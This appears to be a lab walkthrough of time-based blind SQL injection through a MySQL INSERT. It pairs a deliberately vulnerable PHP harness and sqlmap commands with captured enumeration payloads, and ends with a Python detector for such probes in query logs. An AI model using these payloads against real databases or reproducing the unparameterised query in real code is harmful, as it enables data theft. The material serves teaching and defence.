First create a database and a table:
create database blog;
create table admin(id int primary key auto_increment,email varchar(500));
Write an insert.php so that sqlmap has something to run against:
<?php
// Deliberately unparameterised test harness: the GET parameter goes straight
// into the INSERT so that sqlmap has an injection point to find.
$conn=mysql_connect("localhost","root","yourpass");
mysql_select_db("blog",$conn);   // the admin table lives in the blog database created above
if(isset($_GET["email"])){
$email=$_GET['email'];
mysql_query("insert into admin(email) values('$email')");
}
?>
Use Seay's MySQL monitor to watch the statements the database actually executes; this is more convenient than capturing packets.
sqlmap -u http://127.0.0.1/[email protected]
It detects a time-based injection; the payload is [email protected]' and sleep(5) and 'ufwy'='ufwy
So the statement the database executes should be:
insert into admin(email) values('[email protected]' and sleep(5) and 'ufwy'='ufwy');
In the MySQL monitor, look at how it runs --dbs:
insert into admin(email)values('[email protected]' AND 4830=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1)) > 51),SLEEP(5),4830) AND 'XDSc'='XDSc')
insert into admin(email)values('[email protected]' AND 6499=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1)) > 64),SLEEP(2),6499) AND 'ngXr'='ngXr')
-D blog --tables
insert into admin(email)values('[email protected]' AND 3039=IF((ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x626c6f67 LIMIT 1,1),7,1)) > 112),SLEEP(6),3039) AND 'sAEl'='sAEl')
-D blog -T admin --dump
It did not manage to dump the data; time-based injection is just too limited. There are of course cases where error-based injection through an INSERT works, but that does not apply to the situation above.
In short, the core of INSERT INTO time-based injection is:
insert into admin(email) values('[email protected]' and if(true,sleep(5),0));
Source: unknown
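The statement monitoring used above is also where a defender can catch this: a conditional SLEEP() inside an INSERT is not something legitimate application code produces. As an added example (not from the original post), the Python below scans general-query-log-style lines for sqlmap-style probes and recovers what each one is reading; the log lines are constructed from the statements shown above, and the log format and field names are assumptions.

```python
import re

# Constructed sample in the shape of a MySQL general query log (not a real capture).
SAMPLE_LOG = (
    "2024-01-01T10:00:00Z\t  12 Query\tinsert into admin(email) values('a@b.c')\n"
    "2024-01-01T10:00:01Z\t  12 Query\tinsert into admin(email)values('a@b.c' AND 4830=IF((ORD(MID((SELECT "
    "IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1)) > 51),"
    "SLEEP(5),4830) AND 'XDSc'='XDSc')\n"
    "2024-01-01T10:00:07Z\t  12 Query\tinsert into admin(email)values('a@b.c' AND 3039=IF((ORD(MID((SELECT "
    "IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x626c6f67 "
    "LIMIT 1,1),7,1)) > 112),SLEEP(6),3039) AND 'sAEl'='sAEl')\n"
    "2024-01-01T10:00:08Z\t  13 Query\tselect sleep(1)\n"
)

SLEEP_RE = re.compile(r"\bSLEEP\s*\(\s*(\d+)", re.I)
# ORD(MID((<subquery>),<pos>,1)) > <n>: one step of sqlmap's per-character binary search
PROBE_RE = re.compile(r"MID\(\((.*?)\),\s*(\d+),\s*1\)\)\s*>\s*(\d+)", re.I | re.S)


def is_timing_probe(stmt):
    """SLEEP() guarded by IF/CASE, or SLEEP() anywhere inside a write statement,
    is the signature of time-based blind injection rather than legitimate use."""
    if not SLEEP_RE.search(stmt):
        return False
    is_write = re.match(r"\s*(insert|update|delete)\b", stmt, re.I) is not None
    conditional = re.search(r"\bIF\s*\(|\bCASE\b", stmt, re.I) is not None
    return is_write or conditional


def analyze_log(text):
    """One finding per probe: connection thread, requested delay, and what the
    attacker is reading (source table, target schema, char position, comparison)."""
    findings = []
    for line in text.splitlines():
        parts = line.split("\t", 2)  # time, "<thread_id> <command>", argument
        if len(parts) != 3 or not parts[1].strip().endswith("Query") or not is_timing_probe(parts[2]):
            continue
        ts, id_cmd, stmt = parts
        f = {"time": ts, "thread": int(id_cmd.split()[0]),
             "delay_s": int(SLEEP_RE.search(stmt).group(1)),
             "source": None, "schema": None, "position": None, "threshold": None}
        p = PROBE_RE.search(stmt)
        if p:
            sub, pos, thr = p.groups()
            f["position"], f["threshold"] = int(pos), int(thr)
            src = re.search(r"INFORMATION_SCHEMA\.(\w+)", sub, re.I)
            f["source"] = src.group(1).upper() if src else None
            hexdb = re.search(r"table_schema\s*=\s*0x([0-9a-f]+)", sub, re.I)  # 0x626c6f67 = 'blog'
            f["schema"] = bytes.fromhex(hexdb.group(1)).decode() if hexdb else None
        findings.append(f)
    return findings
```

A run of findings from one thread with rising positions and changing thresholds is the binary search in progress; the lone `select sleep(1)` on another thread is not flagged.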